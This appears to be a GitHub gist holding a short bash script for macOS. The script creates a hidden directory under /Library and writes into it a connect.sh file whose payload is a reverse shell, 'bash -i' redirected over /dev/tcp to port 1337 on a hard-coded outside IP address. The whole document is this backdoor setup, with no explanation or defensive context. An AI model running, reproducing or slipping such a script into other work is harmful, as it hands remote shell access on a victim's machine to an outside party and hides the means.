This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
#Create the hidden directory /Library/.hidden | |
mkdir /Library/.hidden | |
#Copy the script to hidden folder | |
echo " | |
#!/bin/bash | |
bash -i >& /dev/tcp/107.170.117.216/1337 0>&1 | |
wait" > /Library/.hidden/connect.sh |